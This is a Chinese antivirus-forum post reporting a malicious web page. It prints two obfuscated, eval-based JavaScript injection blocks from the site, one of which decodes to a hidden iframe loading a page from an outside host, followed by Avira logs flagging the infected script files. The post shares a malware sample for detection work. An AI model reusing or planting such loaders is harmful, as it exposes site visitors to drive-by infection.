查看: 1803|回复: 0
收起左侧

[已鉴定] http://www.ppcflier.com/modules.php?name=Your_Account

[复制链接]
fireold
发表于 2013-11-18 19:38:07 | 显示全部楼层 |阅读模式
  1. /*d04bb5*/
  2. try {
  3.     if (window.document)--document.getElementById('12')
  4. } catch (qq) {
  5.     if (qq != null) ss = eval("St" + "ring");
  6. }
  7. a = "2e74837c7182777d7c2e88888874747436372e891b182e846f802e832e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e833c8180712e4b2e357682827e483d3d747780818273727573737c827380826f777c7b737c823c717d7b3d78813d6271875f557b65853c7e767e35491b182e833c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e833c8182877a733c707d807273802e4b2e353e35491b182e833c8182877a733c7673777576822e4b2e353f7e8635491b182e833c8182877a733c85777282762e4b2e353f7e8635491b182e833c8182877a733c7a7374822e4b2e353f7e8635491b182e833c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635833537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35836a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c825087577236358335373c6f7e7e737c725176777a72368337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
  8. z = [];
  9. for (i = 0; i < a.length; i += 2) {
  10.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  11. }
  12. eval(ss["fr" + "omCharCode"].apply(ss, z)); /*/d04bb5*/

  13. /*32f02e*/
  14. zmqsm = "s" + "p" + "li" + "t";
  15. rgow = window;
  16. mht = "dy";
  17. eduv = document;
  18. zta = "0x";
  19. nnytp = (5 - 3 - 1);
  20. try {
  21.     ++(eduv.body)
  22. } catch (etbyjn) {
  23.     cgqnx = false;
  24.     try {} catch (fnhjac) {
  25.         cgqnx = 21;
  26.     }
  27.     if (1) {
  28.         fjc = "17:5d:6c:65:5a:6b:60:66:65:17:6c:6f:62:5f:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6c:6f:62:5f:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6c:6f:62:5f:71:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:59:58:6a:6b:60:58:65:5e:5c:60:5c:69:25:5b:5c:26:41:29:45:49:69:30:43:4d:25:67:5f:67:1e:32:4:1:17:6c:6f:62:5f:71:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:6c:6f:62:5f:71:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:28:28:2c:30:2e:1e:32:4:1:17:6c:6f:62:5f:71:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:28:28:2c:30:2e:67:6f:1e:32:4:1:17:6c:6f:62:5f:71:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:28:28:2c:30:2e:67:6f:1e:32:4:1:17:6c:6f:62:5f:71:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:28:28:2c:30:2e:1e:32:4:1:17:6c:6f:62:5f:71:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:28:28:2c:30:2e:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6c:6f:62:5f:71:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6c:6f:62:5f:71:53:1e:17:5a:63:58:6a:6a:34:53:1e:6c:6f:62:5f:71:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6c:6f:62:5f:71:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:6c:6f:62:5f:71:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6c:6f:62:5f:71:27:30:1f:20:32:4:1:74:4:1:74" [zmqsm](":");
  29.     }
  30.     rgow = fjc;
  31.     lzbnmo = [];
  32.     for (eflpyl = 22 - 20 - 2; - eflpyl + 1438 != 0; eflpyl += 1) {
  33.         qutn = eflpyl;
  34.         if ((0x19 == 031)) lzbnmo += String["fromCharCode"](eval(zta + rgow[1 * qutn]) + 0xa - nnytp);
  35.     }
  36.     rsq = eval;
  37.     rsq(lzbnmo)
  38. } /*/32f02e*/
复制代码



Avira
2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery.hoverIntent.minified[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '7c0110d9.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery[5].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '00195089.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\rn[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26004.
      找不到來源檔案。.
      嘗試使用 ARK 程式庫執行動作。.
      檔案無法複製至隔離區!.
      檔案不存在!.

2013/11/18 下午 07:33 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        800
      目錄數:        0
      惡意程式碼數:        9
      警告數:        0

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\boxover[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '49cc040c.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery.colorbox-min[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '515b3f94.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\supersubs[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '100e2ca1.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\VUGD722P\modules[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '42457842.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\nukeNAV[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '33b04e5d.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\superfish[3].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '76396363.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\rn[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
      已採取動作:
      檔案會移動至 '553f590f.qua' 名稱底下的隔離區目錄。.

2013/11/18 下午 07:33 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        792
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery.hoverIntent.minified[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery.colorbox-min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\VUGD722P\modules[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\rn[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\superfish[3].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\supersubs[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery[5].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\boxover[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\nukeNAV[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\boxover[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery.colorbox-min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery[5].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery.hoverIntent.minified[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\nukeNAV[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\supersubs[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\superfish[3].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\rn[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
      執行的動作:拒絕存取

2013/11/18 下午 07:32 [Web Protection] 已停用 Web Protection
      服務已停用

2013/11/18 下午 07:31 [Web Protection] 封鎖的網頁
      URL (http://www.ppcflier.com/modules.php?name=Your_Account) 的評估結果為 惡意程式碼,而遭到封鎖。


av2.jpg



fs is
fs2.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 14:54 , Processed in 0.130971 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表